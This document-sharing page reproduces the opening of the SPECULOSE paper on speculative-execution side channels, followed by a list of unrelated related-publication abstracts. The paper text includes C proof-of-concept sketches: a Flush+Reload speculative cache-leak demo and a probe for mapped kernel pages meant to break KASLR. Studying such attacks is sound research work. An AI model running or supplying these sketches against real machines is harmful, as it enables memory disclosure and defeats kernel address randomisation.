Analyzing the Security Implications of Speculative Execution in CPUs

Total Pages: 16

File Type: PDF, Size: 1020 KB

SPECULOSE: Analyzing the Security Implications of Speculative Execution in CPUs

Giorgi Maisuradze and Christian Rossow, CISPA, Saarland University, Saarland Informatics Campus. [email protected], [email protected]

arXiv:1801.04084v1 [cs.CR] 12 Jan 2018

Abstract—Whenever modern CPUs encounter a conditional branch for which the condition cannot be evaluated yet, they predict the likely branch target and speculatively execute code. Such pipelining is key to optimizing runtime performance and has been incorporated in CPUs for more than 15 years. In this paper, to the best of our knowledge, we are the first to study the inner workings and the security implications of such speculative execution. We revisit the assumption that speculatively executed code leaves no traces in case it is not committed. We reveal several measurable side effects that allow adversaries to enumerate mapped memory pages and to read arbitrary memory—all using only speculated code that was never fully executed. To demonstrate the practicality of such attacks, we show how a user-space adversary can probe for kernel pages to reliably break kernel-level ASLR in Linux in under three seconds and reduce the Windows 10 KASLR entropy by 18 bits in less than a second.

Disclaimer: This work on speculative execution was conducted independently from other research groups and was submitted to IEEE S&P '18 in October 2017. Any techniques and experiments presented in this paper predate the public disclosure of the attacks that became known as Meltdown [25] and Spectre [22], which were released in early January 2018.

I. INTRODUCTION

Being at the core of any computer system, CPUs have always strived for maximum execution efficiency. Several hardware-based efforts have been undertaken to increase CPU performance, such as higher clock frequencies, more cores, or additional cache levels. Orthogonal to such developments, vendors have long invested in logical optimization techniques, such as complex cache eviction algorithms, branch predictors, or instruction reordering. These developments made clear that CPUs no longer represent hardware-only components. Yet our level of understanding of the algorithmic, i.e., software-side, aspects of CPUs is in its infancy. Given that many CPU design details remain corporate secrets, it requires tedious reverse engineering attempts to understand the inner workings of CPUs [23].

In this paper, we argue that this is a necessary direction of research and investigate the security implications of one of the core logical optimization techniques that is ubiquitous in modern CPUs: speculative execution. Whenever facing a conditional branch for which the outcome is not yet known, instead of waiting (stalling), CPUs usually speculate one of the branch targets. This way, CPUs can still fully leverage their instruction pipelines. They predict the outcome of conditional branches and follow the more likely branch target to continue execution. Upon visiting a particular branch for the first time, CPUs use static prediction, which usually guesses that backward jumps (common in loops to repeat the loop body) are taken, whereas forward jumps fall through (common in loops so as not to abort the loop). Over time, the CPU will learn the likely branch target and then use dynamic prediction to take the more likely target. When a CPU discovers that it mispredicted a branch, it will roll back the speculated instructions and their results. Despite this risk of mispredictions, speculative execution has significantly sped up CPU performance and is part of most modern CPUs from popular vendors such as Intel, AMD, and ARM licensees.

To the best of our knowledge, we are the first to analyze the security implications of speculative execution. So far, the only known drawback of speculative execution is a slightly higher energy consumption due to non-committed instructions [27]. As we show, its drawbacks go far beyond reduced energy efficiency. Our analysis follows the observation that CPUs, when executing code speculatively, might leak data from the speculated execution branch, although this code would never have been executed in a non-speculative world. Ideally, speculated code should not change the CPU state unless it is committed at a later stage (e.g., because the predicted branch target was confirmed). We analyze how an adversary might undermine this assumption by causing measurable side effects during speculative execution.

We find that at least two feedback channels exist to leak data from speculative execution, even if the speculated code, and thus its results, are never committed. Whereas one side channel uses our observation that speculated code can change cache states, the other side channel observes differences in the time it takes to flush the instruction pipeline.
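To make the cache-based feedback channel concrete, the following is a minimal, self-contained sketch of the general effect (assuming x86-64, GCC or Clang, and a CPU without the later mitigations): a bounds check guards an array access, the branch predictor is trained so that the check is predicted to pass, and a cache line touched only by the speculated body is detected afterwards through access timing. The gadget, buffer names, and the timing threshold are illustrative assumptions and not the paper's measurement code.

// Sketch only: shows that a memory access performed purely speculatively can
// still leave a measurable cache trace. Build with: gcc -O1 spec_cache_sketch.c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <x86intrin.h>            // _mm_clflush, _mm_mfence, __rdtscp

#define STRIDE 4096               // one page per slot to sidestep the prefetcher
#define HIT_THRESHOLD 80          // cycles; machine-dependent assumption

static uint8_t probe[256 * STRIDE];   // feedback buffer, read back via timing
static uint8_t data[16] = "public";
static volatile size_t bound = 6;     // bounds check guarding the access

// The probe[] access is architecturally reachable only when idx < bound, but a
// mispredicted branch may still execute it speculatively.
static void gadget(size_t idx) {
    if (idx < bound) {
        volatile uint8_t v = probe[data[idx] * STRIDE];
        (void)v;
    }
}

static uint64_t time_read(volatile uint8_t *addr) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*addr;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

int main(void) {
    memset(probe, 1, sizeof(probe));
    for (size_t i = 0; i < 64; i++)           // train the predictor: branch taken
        gadget(i % bound);
    for (int i = 0; i < 256; i++)             // flush the whole feedback buffer
        _mm_clflush(&probe[i * STRIDE]);
    _mm_clflush((const void *)&bound);        // delay the check, widening the window
    _mm_mfence();
    gadget(10);                               // out of bounds: never commits
    for (int i = 0; i < 256; i++)             // a fast reload exposes the trace
        if (time_read(&probe[i * STRIDE]) < HIT_THRESHOLD)
            printf("probe slot %d is cached (touched only speculatively)\n", i);
    return 0;
}

Whether a hit actually shows up depends on the microarchitecture, compiler optimizations, and deployed mitigations; the point is merely that a never-committed memory access can become observable afterwards.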
With these techniques at hand, we then analyze the security implications of the possibility to leak data from within speculative execution. We first show how a user-space attacker can abuse speculative execution to reliably read arbitrary user-space memory. While this sounds boring at first, we then also discuss how that might help an attacker to access memory regions that are guarded by conditionals, such as in sandboxes. We then analyze whether an unprivileged user can use speculation to read even kernel memory. We show that this attack is fortunately not possible. That is, speculative execution protects against invalid reads in that the results of access-violating reads (e.g., from user to kernel) are zeroed.

This observation, however, leads us to discover a severe side channel that allows one to distinguish between mapped and unmapped kernel pages. In stark contrast to access-violating memory reads (which are zeroed), page faults (i.e., accesses to non-mapped kernel pages) stall the speculative execution. We show that an attacker can use this distinction to reliably and efficiently determine whether a virtual memory page is mapped. This effectively undermines a fundamental assumption of kernel-based Address Space Layout Randomization (KASLR) designs [10] present in modern OSes (Windows 8.x+, Linux kernel 4.4+, iOS 4.3+, Android 8.x): KASLR's foremost goal is to hide the location of the kernel image, which is easily broken with speculative execution. Access violations in speculative execution—in contrast to violations in non-speculated execution—do not cause program crashes due to segmentation faults, allowing one to easily repeat checks in multiple memory ranges. In our experiments, we use commodity hardware to show that one can reliably break KASLR on Ubuntu 16.04 with kernel 4.13.0 in less than three seconds.
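The mapped/unmapped distinction can be turned into a user-space probe along the following lines. This is a rough, hypothetical sketch of the behavior described above (access-violating reads returning zero inside speculation, page faults stalling it) and not the authors' prototype; the candidate address, round counts, and threshold are placeholders, and current microcode and kernel mitigations will likely defeat it.

// Hypothetical sketch: classify a kernel address as mapped or unmapped by
// checking whether a dependent, speculation-only access leaves a cache trace.
#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>

#define STRIDE 4096
#define HIT_THRESHOLD 80                     // cycles; machine-dependent assumption

static uint8_t probe[2 * STRIDE];
static volatile size_t bound = 1;

// For idx == 1 the body never commits, so the kernel dereference cannot raise a
// visible segmentation fault; it only ever runs speculatively.
static void speculative_probe(size_t idx, const volatile uint8_t *kaddr) {
    if (idx < bound) {
        volatile uint8_t v = probe[(*kaddr & 1) * STRIDE];   // dependent access
        (void)v;
    }
}

static uint64_t time_read(volatile uint8_t *addr) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*addr;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

static int page_seems_mapped(uintptr_t kaddr) {
    int hits = 0;
    for (int round = 0; round < 16; round++) {
        for (int i = 0; i < 64; i++)                  // train: branch taken
            speculative_probe(0, probe);
        _mm_clflush(&probe[0]);                       // reset the feedback line
        _mm_clflush((const void *)&bound);            // widen the speculation window
        _mm_mfence();
        speculative_probe(1, (const volatile uint8_t *)kaddr);
        // Mapped page: zeroed read -> probe[0] touched -> fast reload.
        // Unmapped page: speculation stalls -> probe[0] stays cold.
        if (time_read(&probe[0]) < HIT_THRESHOLD)
            hits++;
    }
    return hits > 8;
}

int main(void) {
    uintptr_t candidate = 0xffffffff81000000ULL;      // placeholder address to scan
    printf("%#llx: %s\n", (unsigned long long)candidate,
           page_seems_mapped(candidate) ? "likely mapped" : "likely unmapped");
    return 0;
}

Sweeping the candidate address over the possible kernel image locations would then reveal which ranges are backed by mapped pages, which is exactly the information KASLR is meant to hide.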
In this paper, we provide the following contributions:

• To the best of our knowledge, we are the first to explore the internals of speculative execution in modern CPUs. We reveal details of branch predictors and speculative execution in general. Furthermore, we propose two feedback channels that allow us to transfer data from speculation to normal execution. We evaluate these primitives on five Intel CPU architectures, ranging from models from 2004 to recent CPU architectures such as Intel Skylake.

• Based on these new primitives, we discuss potential security implications of speculative execution. We first present how to read arbitrary user-mode memory from inside speculative execution, which may be useful to read beyond software-enforced memory boundaries. We then extend this scheme to a (failed) attempt to read arbitrary kernel memory from user space.

• We discover a severe side channel in Intel's speculative execution engine that allows us to distinguish between a mapped and a non-mapped kernel page. We show how we can leverage this concept to break KASLR implementations of modern operating systems, prototyping it against the Linux kernel 4.13 and Windows 10.

• We discuss potential countermeasures against the security degradation caused by speculative execution, ranging from hardware- and software- to compiler-assisted attempts to fix the discovered weaknesses.

[...] attacks that are possible in the absence of KASLR. Later, in Section IV, we will combine branch prediction and speculative execution to anticipate the speculatively executed path after a conditional branch. This will be a key to executing arbitrary code speculatively, which we will use in our attack to remove the randomness introduced by KASLR.

A. Generic x86 architecture

Despite being a CISC (Complex Instruction Set Computing) architecture, x86 constitutes the prevalent architecture used for desktop and server environments. Extensive optimizations are among the reasons for x86's popularity.

Realizing the benefits of RISC (Reduced Instruction Set Computing) architectures, both Intel and AMD have switched to a RISC-like architecture under the hood. That is, although they still provide a complex instruction set to programmers, internally these instructions are translated into sequences of simpler RISC-like instructions. The high-level and low-level instructions are usually called macro-OPs and micro-OPs, respectively. This construction brings all the benefits of a RISC architecture and allows for simpler constructions and better optimizations, while programmers can still use a rich CISC instruction set. An example of translating a macro-OP into micro-OPs is shown in the following:

add [rax], 1   =>   load  t1, [rax]
                    add   t1, 1
                    store [rax], t1

Using micro-OPs requires far less circuitry in the CPU for their implementation. For example, similar micro-OPs can be grouped together into execution units (also called ports). Such ports allow micro-OPs from different groups to be executed in parallel, given that one does not depend on the results of another. The following is an example that can trivially be run in parallel once converted into micro-OPs:

1 mov [rax], 1
2 add rbx, 2

Both instructions can be executed in parallel. Whereas instruction #1 is executed in the CPU's memory unit, instruction #2 is computed in the CPU's Arithmetic Logic Unit (ALU)—effectively increasing the throughput of the CPU.
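The throughput benefit of spreading independent micro-OPs across ports can be observed from user space with a small timing experiment. The following sketch (an illustration assuming an out-of-order x86-64 CPU and GCC or Clang, not code from the paper) times a chain of dependent additions against the same number of independent additions; the independent version typically needs far fewer cycles because the adds are issued to several ALU ports in parallel.

// Sketch: contrast dependent vs. independent integer adds to observe
// superscalar execution. Build with: gcc -O2 ports_sketch.c
#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>                        // __rdtsc

#define ITERS 10000000ULL

static uint64_t dependent_chain(void) {
    uint64_t a = 1;
    uint64_t start = __rdtsc();
    for (uint64_t i = 0; i < ITERS; i++) {
        // Each add consumes the previous result: one long dependency chain.
        asm volatile("add $1, %0\n\t"
                     "add $1, %0\n\t"
                     "add $1, %0\n\t"
                     "add $1, %0" : "+r"(a));
    }
    uint64_t end = __rdtsc();
    (void)a;
    return end - start;
}

static uint64_t independent_adds(void) {
    uint64_t a = 1, b = 1, c = 1, d = 1;
    uint64_t start = __rdtsc();
    for (uint64_t i = 0; i < ITERS; i++) {
        // Four independent adds: the scheduler can issue them to different ports.
        asm volatile("add $1, %0\n\t"
                     "add $1, %1\n\t"
                     "add $1, %2\n\t"
                     "add $1, %3" : "+r"(a), "+r"(b), "+r"(c), "+r"(d));
    }
    uint64_t end = __rdtsc();
    (void)(a + b + c + d);
    return end - start;
}

int main(void) {
    printf("dependent chain:  %llu cycles\n", (unsigned long long)dependent_chain());
    printf("independent adds: %llu cycles\n", (unsigned long long)independent_adds());
    return 0;
}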
Recommended publications
  • Security Analysis of Docker Containers in a Production Environment
    Security analysis of Docker containers in a production environment. Jon-Anders Kabbe. Master of Science in Communication Technology, submission date: June 2017. Supervisor: Colin Alexander Boyd, IIK. Co-supervisor: Audun Bjørkøy, TIND Technologies. Norwegian University of Science and Technology, Department of Information Security and Communication Technology.
    Title: Security Analysis of Docker Containers in a Production Environment. Student: Jon-Anders Kabbe.
    Problem description: Deployment of Docker containers has achieved its popularity by providing an automatable and stable environment serving a particular application. Docker creates a separate image of a file system with everything the application requires during runtime. Containers run atop the regular file system as separate units containing only the libraries and tools that the particular application requires. Docker containers reduce the attack surface, improve process interaction and simplify sandboxing. But containers also raise security concerns: reduced segregation between the operating system and the application, out-of-date or varying libraries and tools, and a technology that is still unsettled. Docker containers provide a stable and static environment for applications; this is achieved by creating a static image of only the libraries and tools the specific application needs during runtime. Out-of-date tools and libraries are a major security risk when exposing applications over the Internet, but availability is essential in a competitive market. Does Docker raise some security concerns compared to standard application deployment such as hypervisor-based virtual machines? Are the Docker “best practices” sufficient to secure the container, and how does this compare to traditional virtual machine application deployment?
    Responsible professor: Colin Alexander Boyd, ITEM. Supervisor: Audun Bjørkøy, TIND Technologies.
    Abstract: Container technology for hosting applications on the web is gaining traction as the preferred mode of deployment.
  • Computer Science 246 Computer Architecture Spring 2010 Harvard University
    Computer Science 246: Computer Architecture, Spring 2010, Harvard University. Instructor: Prof. David Brooks, [email protected]. Dynamic Branch Prediction, Speculation, and Multiple Issue.
    Lecture Outline: • Tomasulo's Algorithm Review (3.1-3.3) • Pointer-Based Renaming (MIPS R10000) • Dynamic Branch Prediction (3.4) • Other Front-end Optimizations (3.5) – Branch Target Buffers/Return Address Stack.
    Tomasulo Review: • Reservation Stations – distribute RAW hazard detection; renaming eliminates WAW hazards; buffering values in reservation stations removes WARs; tag match on the CDB requires many associative compares. • Common Data Bus – the Achilles heel of Tomasulo; multiple writebacks (multiple CDBs) are expensive. • Load/Store reordering – load address compared with store address in the store buffer.
    [Figure: Tomasulo organization – FP op queue and FP registers feeding load buffers (Load1–Load6), store buffers, and reservation stations (Add1–Add3, Mult1–Mult2) for the FP adders and multipliers, all connected by the Common Data Bus (CDB).]
    [Table: cycle-by-cycle Tomasulo review example (cycles 1–20) showing issue, memory, execute, and write-back stages for a loop of LD, MUL, SD, SUBI, and BNEZ instructions.]
  • The Rise and Imminent Fall of the N-Day Exploit Market in the Cybercriminal Underground
    The Rise and Imminent Fall of the N-Day Exploit Market in the Cybercriminal Underground. Mayra Rosario Fuentes and Shiau-Jing Ding.
    Contents: Introduction (4); Overview of Exploit Developers (7); Overview of Exploit Demand and Availability (12); Outdated Exploits (16).
    TREND MICRO LEGAL DISCLAIMER: The information provided herein is for general information and educational purposes only. It is not intended and should not be construed to constitute legal advice. The information contained herein may not be applicable to all situations and may not reflect the most current situation. Nothing contained herein should be relied on or acted upon without the benefit of legal advice based on the particular facts and circumstances presented, and nothing herein should be construed otherwise. Trend Micro reserves the right to modify the contents of this document at any time without prior notice. Translations of any material into other languages are intended solely as a convenience. Translation accuracy is not guaranteed nor implied. If any questions arise related to the accuracy of a translation, please refer to the original language official version of the document. Any discrepancies or differences created in the translation are not binding and have no legal effect for compliance or enforcement purposes. Although Trend Micro uses reasonable efforts to include accurate and up-to-date information herein, Trend Micro makes no warranties or representations of any kind as to its accuracy, currency, or completeness. You agree that access to and use of and reliance on this document and the content thereof is at your own risk. Trend Micro disclaims all warranties of any kind, express or implied.
  • SSTIC-2021-Actes.pdf
    Preface. Wednesday, 2 June 2021, 8 a.m. Running on a caffeine drip, eyes barely open, I am with the rest of the organizing committee (CO), which is in position and attending to the final details, checking that the check-in system and the badge readers are working. Meanwhile, a few die-hards are already outside, despite the Breton drizzle, ready to rush in so they can be the first to discover the goodies and settle comfortably into the amphitheater, in their favorite seats, to leaf through the proceedings and read the preface. We open the doors; here we go for the 19th SSTIC! Fade. Eight hundred people in the amphitheater in front of us; I check with the invited speaker giving the opening talk that everything is ready. With stage fright, and the spotlights blinding me, I step forward to say a few words and launch the conference... And to think that about a third of the attendees are newcomers! Fade. A quick visit to the control room to talk with the technicians of the Couvent and make sure the streaming is going well. Oops, I am curtly told to move away from the camera; apparently the walkie-talkies that keep us in touch with the rest of the CO, scattered between the front row and the reception desk, make the stabilizer's magnets shake... Fade. After the presentation of the challenge results and a successful rump session, during which we had to run around the amphitheater to hand over the microphone, here we are in the magnificent cloister of the Couvent, under a welcome sun. The petits fours are excellent, and I can tell from the crowd that quickly forms that the foie gras stand has just opened.
  • Area Efficient and Low Power Carry Select Adder Using
    International Journal of Advances in Electronics and Computer Science, ISSN(p): 2394-2835, Volume-6, Issue-7, Jul.-2019, http://iraj.in
    EVOLUTION OF ANDROID MALWARE OFFENSE AND ANDROID ECOSYSTEM DEFENSE. Nishant Pandit (Student) and Deepti V. Vidyarthi (Assistant Professor), Defence Institute of Advanced Technology, Girinagar, Pune, Maharashtra – 411025, India. E-mail: [email protected], [email protected]
    Abstract - Android mobile devices are used more and more in everyday life. They are our cameras, wallets, and keys; basically, they carry most of our private information in our pocket. The paper captures the journey of Android malware from being a mere revenue-generation incentive for malware developers to stealing the personal data of the people using these devices. It also discusses how the open-source nature of Android has led to fragmentation of the core operating system among various device manufacturers, which introduces additional vulnerabilities. The non-availability of the official Google Play store in some countries has led to the emergence of various third-party application markets, which are largely unregulated in terms of application verification. The Android operating system itself has come a long way in terms of security features and fixed vulnerabilities over the course of a decade. Our evaluation shows that the Android system has become quite robust against malware threats and that automatic installation of malware is not possible without user intervention. We explore certain simple settings on Android that would protect the user from malware threats on an Android device. Keywords - Android System, Malware Analysis, Vulnerabilities, Android Fragmentation.
  • The Shadows of Ghosts Inside the Response of a Unique Carbanak Intrusion
    WHITE PAPER: The Shadows of Ghosts – Inside the response of a unique Carbanak intrusion. By: Jack Wesley Riley – Principal, Incident Response Consultant.
    Table of contents: 1 Glossary of terms (7); 2 Report summary (8); 3 Intrusion overview (13); 3.1 Anatomy of attack (13); 3.1.1 Phase 1: D+0 (14); 3.1.2 Phase 2: D+0 (14); 3.1.3 Phase 3: D+1 through D+3 (16); 3.1.4 Phase 4: D+3 through D+25 (17); 3.1.5 Phase 5: D+25 through D+30 (18); 3.1.6 Phase 6: D+30 through D+44 (19); 3.2 Detection and response (19); 4 Intrusion details.
  • OS and Compiler Considerations in the Design of the IA-64 Architecture
    OS and Compiler Considerations in the Design of the IA-64 Architecture. Rumi Zahir (Intel Corporation), Dale Morris, Jonathan Ross (Hewlett-Packard Company), Drew Hess (Lucasfilm Ltd.). This is an electronic reproduction of "OS and Compiler Considerations in the Design of the IA-64 Architecture", originally published in ASPLOS-IX (the Ninth International Conference on Architectural Support for Programming Languages and Operating Systems) held in Cambridge, MA in November 2000. Copyright © A.C.M. 2000 1-58113-317-0/00/0011...$5.00
    Permission to make digital or hard copies of part or all of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than ACM must be honored. Abstracting with credit is permitted. To copy otherwise, to republish, to post on servers, or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from Publications Dept, ACM Inc., fax +1 (212) 869-0481, or [email protected]. ASPLOS 2000, Cambridge, MA, Nov. 12-15, 2000.
    OS and Compiler Considerations in the Design of the IA-64 Architecture. Rumi Zahir, Intel Corporation, 2200 Mission College Blvd., Santa Clara, CA 95054, [email protected]; Jonathan Ross and Dale Morris, Hewlett-Packard Company, 19447 Pruneridge Ave., Cupertino, CA 95014, [email protected], [email protected]; Drew Hess, Lucas Digital Ltd., P.O. Box 2459, San Rafael, CA 94912, [email protected]
    ABSTRACT: [...] system collaborate to deliver higher-performance systems.
  • Selective Eager Execution on the Polypath Architecture
    Selective Eager Execution on the PolyPath Architecture. Artur Klauser, Abhijit Paithankar, Dirk Grunwald. [klauser,pvega,grunwald]@cs.colorado.edu. University of Colorado, Department of Computer Science, Boulder, CO 80309-0430.
    Abstract: Control-flow misprediction penalties are a major impediment to high performance in wide-issue superscalar processors. In this paper we present Selective Eager Execution (SEE), an execution model to overcome mis-speculation penalties by executing both paths after diffident branches. We present the micro-architecture of the PolyPath processor, which is an extension of an aggressive superscalar, out-of-order architecture. The PolyPath architecture uses a novel instruction tagging and register renaming mechanism to execute instructions from multiple paths simultaneously in the same processor pipeline, while retaining maximum resource availability for single-path code sequences. Results of our execution-driven, pipeline-level simulations show that SEE can improve performance by as much as 36% for [...]
    [...] average misprediction latency is the sum of the architected latency (pipeline depth) and a variable latency, which depends on data dependencies of the branch instruction. The overall cycles lost due to branch mispredictions are the product of the total number of mispredictions incurred during program execution and the average misprediction latency. Thus, reduction of either component helps decrease performance loss due to control mis-speculation. In this paper we propose Selective Eager Execution (SEE) and the PolyPath architecture model, which help to overcome branch misprediction latency. SEE recognizes the fact that some branches are predicted more accurately than others, where it draws from research in branch confidence estimation [4, 6]. SEE behaves like a normal monopath speculative execution architecture for highly predictable branches; it predicts the most likely successor path of a branch, and evaluates instructions only along this path.
  • Igpu: Exception Support and Speculative Execution on Gpus
    Appears in the 39th International Symposium on Computer Architecture, 2012. iGPU: Exception Support and Speculative Execution on GPUs. Jaikrishnan Menon, Marc de Kruijf, Karthikeyan Sankaralingam. Department of Computer Sciences, University of Wisconsin-Madison. {menon, dekruijf, karu}@cs.wisc.edu
    Abstract: Since the introduction of fully programmable vertex shader hardware, GPU computing has made tremendous advances. Exception support and speculative execution are the next steps to expand the scope and improve the usability of GPUs. However, traditional mechanisms to support exceptions and speculative execution are highly intrusive to GPU hardware design. This paper builds on two related insights to provide a unified lightweight mechanism for supporting exceptions and speculation on GPUs. First, we observe that GPU programs can be broken into code regions that contain little or no live register state at their entry point. We then also recognize that it is simple to generate these regions in such a way that they are idempotent.
    [...] the evolution of traditional CPUs to illuminate why this progression appears natural and imminent. Just as CPU programmers were forced to explicitly manage CPU memories in the days before virtual memory, for almost a decade GPU programmers directly and explicitly managed the GPU memory hierarchy. The recent release of NVIDIA's Fermi architecture and AMD's Fusion architecture, however, has brought GPUs to an inflection point: both architectures implement a unified address space that eliminates the need for explicit memory movement to and from GPU memory structures. Yet, without demand paging, something taken for granted in the CPU space, programmers must still explicitly reason about available memory. The drawbacks of exposing physical memory size to programmers are well known.
  • Mobile Threat
    Mobile threat. February 2018. David Bird FBCS considers threats via mobile devices and explains why he thinks the future may not be so bright. The unprecedented WannaCry ransomware and subsequent Petya destruct-ware outbreaks have caused mayhem internationally. As a result of a remote execution vulnerability, malware has propagated laterally due to two basic root causes: (a) outdated operating systems (OS), and/or (b) ineffective patching regimes. Here we have a commonality with the mobile device domain. There are many older-generation devices that have different legacy mobile OSes installed that are no longer supported or updated. Legacy connected Microsoft Pocket PC palmtops and Windows CE or Windows Mobile devices are examples of tech still being used by delivery firms and supermarkets, even though they have been out of extended support since 2008 and 2014 respectively. So, do we have a problem? With over two and a half billion smartphones globally in 2016, the market is anticipated to reach at least six billion by 2020 due to the convenience of mobile back-end-as-a-service. Apparently, one vulnerability is disclosed every day, of which 10 per cent are critical. This figure does not include the number of internet-enabled tablets that are in circulation; in 2015, there were one billion globally, and this is expected to rise to almost one and a half billion by 2018. Today both Android-centric manufacturers and Apple fight for dominance in the mobile device market - squeezing out Blackberry's enterprise smartphone monopoly. This has resulted in unsupported Blackberry smart-devices persisting in circulation, closely followed by successive versions of Windows Phone OS - with only 10 left supported.
  • A Survey of Published Attacks on Intel SGX
    A Survey of Published Attacks on Intel SGX. Alexander Nilsson∗†, Pegah Nikbakht Bideh∗, Joakim Brorsson∗‡§. alexander.nilsson, pegah.nikbakht_bideh, [email protected]. ∗Lund University, Department of Electrical and Information Technology, Sweden. †Advenica AB, Sweden. ‡Combitech AB, Sweden. §Hyker Security AB, Sweden.
    Abstract—Intel Software Guard Extensions (SGX) provides a trusted execution environment (TEE) to run code and operate sensitive data. SGX provides runtime hardware protection where both code and data are protected even if other code components are malicious. However, recently many attacks targeting SGX have been identified and introduced that can thwart the hardware defence provided by SGX. In this paper we present a survey of all attacks specifically targeting Intel SGX that are known to the authors, to date. We categorized the attacks based on their implementation details into 7 different categories. We also look into the available defence mechanisms against identified attacks and categorize the available types of mitigations for each presented attack.
    I. INTRODUCTION
    [...] Unfortunately, a relatively large number of flaws and attacks against SGX have been published by researchers over the last few years.
    A. Contribution
    In this paper, we present the first comprehensive review that includes all known attacks specific to SGX, including controlled channel attacks, cache attacks, speculative execution attacks, branch prediction attacks, rogue data cache loads, microarchitectural data sampling and software-based fault injection attacks. For most of the presented attacks, there are countermeasures and mitigations that have been deployed as microcode patches by Intel or that can be employed by the application developer herself to make the attack more difficult (or impossible) to exploit.
  • Support for Speculative Execution in High-Performance Processors, Michael David Smith, Technical Report CSL-TR-93456, November 1992
    SUPPORT FOR SPECULATIVE EXECUTION IN HIGH- PERFORMANCE PROCESSORS Michael David Smith Technical Report: CSL-TR-93456 November 1992 Computer Systems Laboratory Departments of Electrical Engineering and Computer Science Stanford University Stanford, California 94305-4055 Abstract Superscalar and superpipelining techniques increase the overlap between the instructions in a pipelined processor, and thus these techniques have the potential to improve processor performance by decreasing the average number of cycles between the execution of adjacent instructions. Yet, to obtain this potential performance benefit, an instruction scheduler for this high-performance processor must find the independent instructions within the instruction stream of an application to execute in parallel. For non-numerical applications, there is an insufficient number of independent instructions within a basic block, and consequently the instruction scheduler must search across the basic block boundaries for the extra instruction-level parallelism required by the superscalar and superpipelining techniques. To exploit instruction-level parallelism across a conditional branch, the instruction scheduler must support the movement of instructions above a conditional branch, and the processor must support the speculative execution of these instructions. We define boosting, an architectural mechanism for speculative execution, that allows us to uncover the instruction-level parallelism across conditional branches without adversely affecting the instruction count of the application